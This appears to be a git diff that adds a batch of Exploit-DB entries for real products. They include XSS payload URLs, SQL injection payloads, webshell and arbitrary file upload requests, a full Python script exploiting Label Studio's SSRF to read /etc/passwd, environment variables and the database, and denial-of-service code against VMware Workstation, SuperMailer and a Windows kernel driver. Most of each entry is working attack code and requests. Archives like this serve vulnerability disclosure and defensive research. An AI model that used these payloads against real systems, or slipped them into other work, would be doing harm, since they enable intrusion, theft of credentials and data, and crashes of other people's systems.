inputs, resulting in a reflected +Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in +page parameter. + +Proof of concept: + +Reflected: + +http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E + + +# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2 + +CVSS v3: 6.1 +CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-79 + +Vulnerability description: Online shopping system advanced v1.0, does not +sufficiently encode user-controlled inputs, resulting in a reflected +Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php, +in page parameter. + +Proof of concept: + +Reflected: + +http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E \ No newline at end of file diff --git a/exploits/php/webapps/51104.txt b/exploits/php/webapps/51104.txt new file mode 100644 index 000000000..ce845bd33 --- /dev/null +++ b/exploits/php/webapps/51104.txt @@ -0,0 +1,13 @@ +# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS) +# Date: 2022-10-19 +# Author: Behrouz Mansoori +# Software Link: https://wordpress.org/plugins/jetpack +# Version: 11.4 +# Tested on: Mac m1 +# CVE: N/A + +1. Description: +This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. + +2. Proof of Concept: +http://localhost/modules/contact-form/grunion-form-view.php?post_id= \ No newline at end of file diff --git a/exploits/php/webapps/51108.txt b/exploits/php/webapps/51108.txt new file mode 100644 index 000000000..ba5697135 --- /dev/null +++ b/exploits/php/webapps/51108.txt @@ -0,0 +1,34 @@ +# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) +# Date: 2022-09-18 +# Exploit Author: zetc0de +# Vendor Homepage: https://www.boxbilling.org/ +# Software Link: +https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip +# Version: <=4.22.1.5 (Latest) +# Tested on: Windows 10 +# CVE : CVE-2022-3552 +# BoxBilling was vulnerable to Unrestricted File Upload. +# In order to exploit the vulnerability, an attacker must have a valid +authenticated session as admin on the CMS. +# With at least 1 order of product an attacker can upload malicious file to +hidden API endpoint that contain a webshell and get RCE +################################################################################### + + +## POC +POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1 +Host: local.com:8089 +Content-Length: 52 +Accept: application/json, text/javascript, */*; q=0.01 +DNT: 1 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d +Connection: close + +order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f> + +POC Video : +https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing \ No newline at end of file diff --git a/exploits/php/webapps/51110.txt b/exploits/php/webapps/51110.txt new file mode 100644 index 000000000..e22743738 --- /dev/null +++ b/exploits/php/webapps/51110.txt @@ -0,0 +1,17 @@ +# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) +# Date: 2022-08-10 +# Exploit Author: Sinem Şahin +# Vendor Homepage: https://intelliants.com/ +# Version: 4.2.1 +# Tested on: Windows & XAMPP + +==> Tutorial <== + +1- Go to the following url. => http://(HOST)/panel/fields/add +2- Write XSS Payload into the tooltip value of the field add page. +3- Press "Save" button. +4- Go to the following url. => http://(HOST)/panel/members/add + +XSS Payload ==> " + +Reference: ://github.com/intelliants/subrion/issues/895 \ No newline at end of file diff --git a/exploits/php/webapps/51115.txt b/exploits/php/webapps/51115.txt new file mode 100644 index 000000000..8552923ff --- /dev/null +++ b/exploits/php/webapps/51115.txt @@ -0,0 +1,27 @@ +# Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS) +# Date: 26/10/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://moodle.org/ +# Software Link: https://git.in.moodle.com/moodle +# Version: 4.0 +# Tested on: XAMPP, Windows 10 +# Contact: https://twitter.com/dmaral3noz + +Description: + +A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License + +Vulnerable Code: + +line 111 in file "course/search.php" + +echo $courserenderer->search_courses($searchcriteria); + + +Steps to exploit: +1) Go to http://localhost/course/search.php +2) Insert your payload in the "search" + +Proof of concept (Poc): +The following payload will allow you to run the javascript - +"> \ No newline at end of file diff --git a/exploits/php/webapps/51116.txt b/exploits/php/webapps/51116.txt new file mode 100644 index 000000000..ab1fc1b14 --- /dev/null +++ b/exploits/php/webapps/51116.txt @@ -0,0 +1,53 @@ +## Title: Social-Share-Buttons v2.2.3 - SQL Injection +## Author: nu11secur1ty +## Date: 09.16.2022 +## Vendor: https://wordpress.org/ +## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3 + + +## Description: +The `project_id` parameter from the Social Share Buttons-2.2.3 on the +WordPress-6.0.2 system appears to be vulnerable to SQL injection +attacks. +The malicious user can dump-steal the database, from this system and +he can use it for very malicious purposes. +WARNING: The attacker can retrieve all-database from this system! +NOTE: The users of this system are NOT protected, this SQL +vulnerability is CRITICAL! + +STATUS: HIGH Vulnerability + +[+]Payload: + +```mysql +--- +Parameter: project_id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: action=social-sharing-share&project_id=378116348' or +'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: action=social-sharing-share&project_id=378116348' or +'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND +'KWbC'='KWbC&network_id=5&post_id= +--- +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3) + +## Proof and Exploit: +[href](https://streamable.com/m9r76w) + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51119.txt b/exploits/php/webapps/51119.txt new file mode 100644 index 000000000..e210f33de --- /dev/null +++ b/exploits/php/webapps/51119.txt @@ -0,0 +1,41 @@ +# Exploit Title: iBooking v1.0.8 - Arbitrary File Upload +# Exploit Author: d1z1n370/oPty +# Date: 01/11/2022 +# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088 +# Tested on: Linux +# Version: 1.0.8 + +# Exploit Description: +The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. + + +# PoC request + +POST https://localhost/dashboard/upload-new-media HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://localhost/dashboard/settings +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062 +Content-Length: 449 +Connection: close +Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c + +-----------------------------115904534120015298741783774062 +Content-Disposition: form-data; name="_token" + +kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW +-----------------------------115904534120015298741783774062 +Content-Disposition: form-data; name="is_modal" + +1 +-----------------------------115904534120015298741783774062 +Content-Disposition: form-data; name="file"; filename="upload.php56" +Content-Type: image/gif + +GIF89a; + +-----------------------------115904534120015298741783774062-- \ No newline at end of file diff --git a/exploits/php/webapps/51120.txt b/exploits/php/webapps/51120.txt new file mode 100644 index 000000000..2ef7da05f --- /dev/null +++ b/exploits/php/webapps/51120.txt @@ -0,0 +1,63 @@ +## Title: Senayan Library Management System v9.5.0 - SQL Injection +## Author: nu11secur1ty +## Date: 11.03.2022 +## Vendor: https://slims.web.id/web/ +## Software: https://github.com/slims/slims9_bulian/releases +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0 + +## Description: +The `keywords` parameter appears to be vulnerable to SQL injection attacks. +A single quote was submitted in the keywords parameter, and a general +error message was returned. +Two single quotes were then submitted and the error message +disappeared. The injection is confirmed manually from nu11secur1ty. +The attacker can retrieve all information from the database of this +system, by using this vulnerability. + +## STATUS: HIGH Vulnerability + +[+] Payload: + +```MySQL +--- +Parameter: keywords (GET) + Type: stacked queries + Title: MySQL >= 5.0.12 stacked queries (comment) + Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT +SLEEP(5)# + + Type: time-based blind + Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) + Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7'''))) +RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)# +--- + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0) + +## Proof and Exploit: +[href](https://streamable.com/63og5v) + +## Time spent +`3:00` + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51121.txt b/exploits/php/webapps/51121.txt new file mode 100644 index 000000000..01212e70c --- /dev/null +++ b/exploits/php/webapps/51121.txt @@ -0,0 +1,67 @@ +## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS) +## Author: nu11secur1ty +## Date: 11.03.2022 +## Vendor: https://www.rukovoditel.net/ +## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1 + +## Description: +The application is vulnerable to DOM-based cross-site scripting +attacks. Data is read from `location.hash` and passed to +`jQuery.parseHTML`. +The attacker can use this vulnerability to create an unlimited number +of accounts on this system until it crashed. + +## STATUS: HIGH Vulnerability - CRITICAL + +[+] Payload: + +```POST +GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1 +Host: pwnedhost.com +Accept-Encoding: gzip, deflate +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 +Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg; +cookie_test=please_accept_for_session; +app_login_redirect_to=module%3Ddashboard%2F +Upgrade-Insecure-Requests: 1 +Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1) + +## Proof and Exploit: +[href](https://streamable.com/i1qmfk) + +## Time spent +`3:45` + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/python/webapps/51109.txt b/exploits/python/webapps/51109.txt new file mode 100644 index 000000000..b85a4c12e --- /dev/null +++ b/exploits/python/webapps/51109.txt @@ -0,0 +1,196 @@ +# Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF) +# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition" +# Date: 2022-10-03 +# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com +# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/ +# Software Link: https://github.com/heartexlabs/label-studio/releases +# Version: <=1.5.0 +# CVE : CVE-2022-36551 +# Docker Container: heartexlabs/label-studio + +# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition +# versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system. +# Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote +# attacker to create a new account and then exploit the SSRF. + +# +# This exploit has been tested on Label Studio 1.5.0 +# + +# Exploit Usage Examples (replace with your target details): +# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd +# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ +# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3 + + +import json +import argparse +import requests +import shutil +from urllib.parse import urljoin +from urllib.parse import urlparse +requests.packages.urllib3.disable_warnings() + +# main function for exploit +def main(url, filePath, writePath, username, password, shouldRegister): + # check if the URL is reachable + try: + r = requests.get(url, verify=False) + if r.status_code == 200: + print("[+] URL is reachable") + else: + print("[!] Error: URL is not reachable, check the URL and try again") + exit(1) + + except requests.exceptions.RequestException as e: + print("[!] Error: URL is not reachable, check the URL and try again") + exit(1) + + session = requests.Session() + + login(session, url, username, password, shouldRegister) + print("[+] Logged in") + print("[+] Creating project...") + + # Create a temp project + projectDetails = create_project(session, url) + print("[+] Project created, ID: {}".format(projectDetails["id"])) + + #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ) + print("[+] Attempting to fetch: {}".format(filePath)) + fetch_file(session, url, projectDetails["id"], filePath, writePath) + + print("[+] Deleting Project.. {}".format(projectDetails["id"])) + delete_project(session, url, projectDetails["id"]) + print("[+] Project Deleted") + + print("[*] Finished executing exploit") + + +# login, logs the user in +def login(session, url, username, password, shouldRegister): + + # hit the main page first to get the CSRF token set + r = session.get(url, verify=False) + + r = session.post( + urljoin(url, "/user/login"), + data={ + "email": username, + "password": password, + "csrfmiddlewaretoken": session.cookies["csrftoken"], + }, + verify=False + ) + + if r.status_code == 200 and r.text.find("The email and password you entered") < 0: + return + elif r.text.find("The email and password you entered") > 0 and shouldRegister: + + print("[!] Account does not exist, registering...") + r = session.post( + urljoin(url, "/user/signup/"), + data={ + "email": username, + "password": password, + "csrfmiddlewaretoken": session.cookies["csrftoken"], + 'allow_newsletters': False, + }, + ) + if r.status_code == 302: + # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default) + return + + else: + print("[!] Error: Could not login, check the credentials and try again") + exit(1) + + +# create_project creates a temporary project for exploiting the SSRF +def create_project(session, url): + + + + r = session.post( + urljoin(url, "/api/projects"), + data={ + "title": "TPS Report Finder", + }, + verify=False + ) + + if r.status_code == 200 or r.status_code == 201: + return r.json() + else: + print("[!] Error: Could not create project, check your credentials / permissions") + exit(1) + +def fetch_file(session, url, projectId, filePath, writePath): + + # if scheme is empty prepend file:// + parsedFilePath = urlparse(filePath) + + if parsedFilePath.scheme == "": + filePath = "file://" + filePath + + headers = { + 'Content-Type': 'application/x-www-form-urlencoded' + } + + url = urljoin(url, "/api/projects/{}/import".format(projectId)) + r = session.post(url, + data={ + "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL + }, + headers=headers, + verify=False + ) + + if r.status_code == 201: + # file found! -- first grab the file path details + fileId = r.json()["file_upload_ids"][0] + r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False) + r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True) + print("[+] File found!") + + # if user wants to write to disk, make it so + if writePath != None: + print("[+] Writing to {}".format(writePath)) + # write the file to disk + with open(writePath, 'wb') as handle: + shutil.copyfileobj(r.raw, handle) + handle.close() + return + else: + print("==========================================================") + print(r.text) + print("==========================================================") + return + else: + print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ") + print("\t" + r.json()["validation_errors"]["non_field_errors"][0]) + return + + +def delete_project(session, url, projectId): + + url = urljoin(url, "/api/projects/{}".format(projectId)) + r = session.delete(url, verify=False) + if r.status_code == 200 or r.status_code == 204: + return + else: + print( "[!] Error: Could not delete project, check your credentials / permissions") + exit(1) + +parser = argparse.ArgumentParser() + +parser.add_argument("--url", required=True, help="Label Studio URL") +parser.add_argument("--file", required=True, help="Path to the file you want to fetch") +parser.add_argument("--out", required=False, help="Path to write the file. If omitted will be written to STDOUT") +parser.add_argument("--username", required=False, help="Username for existing account (email)") +parser.add_argument("--password", required=False, help="Password for existing account") +parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist", +) + +args = parser.parse_args() +main(args.url, args.file, args.out, args.username, args.password, args.register) \ No newline at end of file diff --git a/exploits/windows/dos/51100.txt b/exploits/windows/dos/51100.txt new file mode 100644 index 000000000..b64f4bf83 --- /dev/null +++ b/exploits/windows/dos/51100.txt @@ -0,0 +1,127 @@ +#Title: VMware Workstation 15 Pro - Denial of Service +#Author: Milad Karimi +#Date: 2022-10-17 +#Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506) +#Affected: VMware Workstation Pro/Player 15.x + + +config.version = "8" +virtualHW.version = "4" +displayName = "credit's to Ex3ptionaL for find this vouln" +annotation = "Live CD ISO http://www.irongeek.com" +guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln" +guestinfo.vmware.product.url = "http://www.millw0rm.com" +guestinfo.vmware.product.short = "LCDI" +guestinfo.vmware.product.version.major = "1" +guestinfo.vmware.product.version.minor = "0" +guestinfo.vmware.product.version.revision = "0" +guestinfo.vmware.product.version.type = "release" +guestinfo.vmware.product.class = "virtual machine" +guestinfo.vmware.product.build = "1.0.0rc8-20051212" +uuid.action = "create" +guestOS = "winxppro" +##### +# Memory +##### +memsize = "20000000000000" +# memsize = "300000000000000000000000000000" +# memsize = "400000000000000000000" +# memsize = "700000000000000000000000000000000000" +# +# Alternative larger memory allocations +##### +# USB +##### +usb.present = "TRUE" +##### +# Floppy +##### +floppy0.present = "FALSE" +##### +# IDE Storage +##### +ide1:0.present = "TRUE" +#Edit line below to change ISO to boot from +ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso" +ide1:0.deviceType = "cdrom-image" +ide1:0.startConnected = "TRUE" +ide1:0.autodetect = "TRUE" +##### +# Network +##### +ethernet0.present = "TRUE" +ethernet0.connectionType = "nat" +# ethernet0.connectionType = "bridged" +# +# Switch these two to enable "Bridged" vs. "NAT" +##### +# Sound +##### +sound.present = "TRUE" +sound.virtualDev = "es1371" +sound.autoDetect = "TRUE" +sound.fileName = "-1" +##### +# Misc. +# +# (normal)  high +priority.grabbed = "high" +tools.syncTime = "TRUE" +workingDir = "." +# +# (16)  32  64 +sched.mem.pShare.checkRate = "32" +# +# (32)  64  128 +sched.mem.pshare.scanRate = "64" +# +# Higher resolution lockout, adjust values to exceed 800x600 +svga.maxWidth = "8000000000000000000" +svga.maxHeight = "6000000000000000000" +# +# (F) T +isolation.tools.dnd.disable = "FALSE" +# +# (F) T +isolation.tools.hgfs.disable = "FALSE" +# +# (F) T +isolation.tools.copy.disable = "FALSE" +# +# (F) T +isolation.tools.paste.disable = "FALSE" +# +# (T) F +logging = "TRUE" +# +# +# (F) T +log.append = "FALSE" +# +# (3) number of older files kept +log.keepOld = "1" +# +# (0) microseconds +keyboard.typematicMinDelay = 100000000000000000 +uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a" +uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a" +ethernet0.addressType = "generated" +ethernet0.generatedAddress = "00:0c:29:3c:d4:4a" +ethernet0.generatedAddressOffset = "0" +checkpoint.vmState = "live-cd-iso.vmss" + +tools.remindInstall = "TRUE" + +Exploit code() + +buffer = "A" * 118000000000000000 +payload = buffer +try: +    f=open("PoC.vmx","w") +    print "[+] Creating %s evil payload.." %len(payload) +    f.write(payload) +    f.close() +    print "[+] File created!" +except: +    print "File cannot be created" +            \ No newline at end of file diff --git a/exploits/windows/dos/51102.txt b/exploits/windows/dos/51102.txt new file mode 100644 index 000000000..aff0a0457 --- /dev/null +++ b/exploits/windows/dos/51102.txt @@ -0,0 +1,62 @@ +# Exploit Title: SuperMailer v11.20 - Buffer overflow DoS +# Exploit Author: Rafael Pedrero +# Discovery Date: 2021-02-07 +# Vendor Homepage: +https://int.supermailer.de/download_newsletter_software.htm +# Software Link : https://int.supermailer.de/smintsw.zip / +https://int.supermailer.de/smintsw_x64.zip +# Tested Version: v11.20 32bit/64bit [11.20.0.2204] +# Tested on: Windows 7, 10 + +CVSS v3: 3.3 +CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L +CWE: CWE-20 + +Vulnerability description: A vulnerability in Newsletter Software +SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to +cause a process crash resulting in a Denial of service (DoS) condition for +the application on an affected system. The vulnerability exists due to +insufficient validation of certain elements with a configuration file +malformed. An attacker could exploit this vulnerability by sending a user a +malicious SMB (configuration file) file through a link or email attachment +and persuading the user to open the file with the affected software on the +local system. A successful exploit could allow the attacker to cause the +application to crash when trying to load the malicious file. + +Proof of concept: + +1.- Go to File -> Save program options... +2.- Save the file (default extension *.smb) +3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb +file + +Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F + +00000000 10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41 ........©å~AAAAA +00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +000000B0 41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00 AA—™å@.......... +000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +000000E0 00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00 ......k...S.o.f. +000000F0 74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00 t.w.a.r.e.\.M.i. +00000100 72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00 r.k.o. .B.o.e.e. +00000110 72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 r. .S.o.f.t.w.a. +00000120 72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00 r.e.\.S.u.p.e.r. +00000130 4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00 M.a.i.l.e.r.\.T. +00000140 65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00 e.s.t. .E.M.a.i. +00000150 6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 l. .A.d.d.r.e.s. +00000160 73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00 s.e.s........... + +And save the file. + +4.- Go to File -> Restore program options... +5.- The application "sm.exe" crash. \ No newline at end of file diff --git a/exploits/windows/dos/51114.c b/exploits/windows/dos/51114.c new file mode 100644 index 000000000..e09fa465a --- /dev/null +++ b/exploits/windows/dos/51114.c @@ -0,0 +1,48 @@ +// Exploit Title: Tunnel Interface Driver - Denial of Service +// Date: 07/15/2022 +// Exploit Author: ExAllocatePool2 +// Vendor Homepage: https://www.microsoft.com/ +// Software Link: https://www.microsoft.com/en-us/software-download/windows10 +// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288) +// Tested on: Microsoft Windows +// GitHub Repository: https://github.com/Exploitables/MSRC-1 + +#include +#include + +#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl" + +int main(int argc, char** argv); + +int main(int argc, char** argv) +{ + HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0); + unsigned long long input_output = 0x4242424242424242; + unsigned long bytes_returned = 0x43434343; + unsigned char unused = 0; + + SetConsoleTitleA("https://msrc.microsoft.com/"); + + printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!"); + + if (h_driver == (HANDLE)-1) + { + printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError()); + unused = getchar(); + return 1; + } + printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver); + + printf("\n[!] Triggering a denial of service via arbitrary read in 3..."); + for (int i = 2; i > 0; i--) + { + Sleep(1000); + printf("\n[!] %d...", i); + } + + DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0); + + unused = getchar(); + printf("\n[-] Exploit failed. The machine should have crashed."); + return 0; +} \ No newline at end of file diff --git a/exploits/windows/local/51105.txt b/exploits/windows/local/51105.txt new file mode 100644 index 000000000..033269e7d --- /dev/null +++ b/exploits/windows/local/51105.txt @@ -0,0 +1,66 @@ +# Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path +# Exploit Author: Jorge Manuel Lozano Gómez +# Date: 2022-10-19 +# Vendor Homepage: https://www.panterasoft.com +# Software Link: https://hdd-health.softonic.com +# Version : 4.2.0.112 +# Tested on: Windows 11 64bit +# CVE : N/A + + +About Unquoted Service Path : +============================== + +When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. +(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). + +Description: +============================== +HDD Health installs a service with an unquoted service path. +To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +# PoC +=========== + +1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] +2. The vulnerable service would show up. +3. Check the service permissions by typing [ sc qc "HDDHealth" ] +4. The command would return.. + + C:\>sc qc "HDDHealth" + [SC] QueryServiceConfig SUCCESS + + + SERVICE_NAME: HDDHealth + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files 